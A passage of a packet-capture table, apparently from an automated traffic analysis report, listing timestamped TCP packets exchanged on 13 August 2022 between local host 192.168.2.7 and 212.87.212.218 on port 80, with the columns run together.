                                                                                                          Aug 13, 2022 09:06:59.052215099 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052221060 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052241087 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052258968 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052261114 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052275896 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052293062 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052293062 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052310944 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052329063 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052331924 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052347898 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052365065 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052372932 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052381992 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052401066 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052413940 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052419901 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052437067 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052440882 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052454948 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052473068 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052486897 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052496910 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052517891 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052530050 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052539110 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052551031 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052562952 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052584887 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052599907 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052608967 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052633047 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052644014 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052658081 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052663088 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052683115 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052706003 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052711964 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052728891 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052736998 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052761078 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052771091 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052786112 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052804947 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052808046 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052830935 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052840948 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052855968 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052875996 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052875996 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052895069 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052915096 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052916050 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052942038 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052949905 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052963018 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.052970886 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.052998066 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.053010941 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.053019047 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.053037882 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.053044081 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.053064108 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.053067923 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.053086042 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.053093910 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.053118944 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.053118944 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.053155899 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.053189993 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.053539991 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.062889099 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.062943935 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.062982082 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.063044071 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.063047886 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.063085079 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.063167095 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.070744038 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.070799112 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.070854902 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.070897102 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.070924997 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.070930004 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.070930958 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.070969105 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.070987940 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071023941 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071031094 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071090937 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071120024 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071142912 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071149111 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071166992 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071196079 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071223021 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071249962 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071268082 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071280003 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071280956 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071288109 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071295977 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071301937 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071309090 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071310997 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071312904 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071332932 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071340084 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071374893 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071389914 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071413040 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071413040 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071438074 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071460009 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071460962 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071475983 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071485996 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071500063 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071511030 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071535110 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071548939 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071561098 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071561098 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071574926 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071585894 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071599007 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071609974 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071634054 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071640015 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071655035 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071656942 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071674109 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071682930 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071691990 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071707964 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071726084 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071732998 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071747065 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071758032 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071769953 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071783066 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071803093 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071805954 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071818113 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071830988 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071841955 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071856022 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071878910 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071878910 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071897030 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071922064 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071923971 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071947098 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071958065 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071969032 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.071983099 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.071995020 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072006941 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072017908 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072031975 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072040081 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072053909 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072066069 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072074890 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072087049 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072094917 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072112083 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072118044 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072135925 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072139978 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072161913 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072166920 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072205067 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072220087 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072221994 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072252035 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072262049 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072276115 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072295904 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072299004 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072320938 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072324038 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072335005 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072346926 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072370052 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072374105 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072390079 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072395086 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072417021 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072429895 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072438955 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072462082 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072474957 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072484016 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072489977 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072509050 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072530031 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072532892 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072551966 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072556019 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072576046 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072577000 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072597980 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072609901 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072622061 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072648048 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072650909 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072669983 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072686911 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072694063 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072719097 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072724104 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072742939 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072755098 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072766066 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072788954 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072797060 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072812080 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072834015 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072834015 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072855949 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072874069 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072880030 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072897911 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072901964 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072925091 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072941065 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072947979 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072973013 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.072984934 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.072994947 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073014975 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073018074 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073041916 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073054075 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073065042 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073076963 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073088884 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073112965 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073113918 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073138952 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073154926 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073163033 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073185921 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073189974 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073210955 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073229074 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073234081 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073251963 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073257923 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073273897 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073283911 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073306084 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073307991 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073328018 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073333979 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073350906 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073360920 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073374987 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073396921 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073399067 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073420048 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073432922 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073443890 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073466063 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073466063 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073491096 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073502064 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073513985 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073537111 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073539019 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073559046 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073580027 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073580980 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073601961 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073606014 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073630095 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073641062 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073652029 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073676109 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073676109 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073698997 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073720932 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073741913 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073744059 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073751926 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073765993 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073771000 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073790073 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073813915 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073816061 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073832989 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073836088 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073858976 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073873997 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073882103 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073894978 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073904991 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073916912 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073929071 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073946953 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073951006 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073961973 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.073973894 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.073997021 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.074004889 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.074019909 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.074027061 CEST4976180192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:06:59.074043036 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.074064970 CEST8049761212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:06:59.074067116 CEST4976180192.168.2.7212.87.212.218
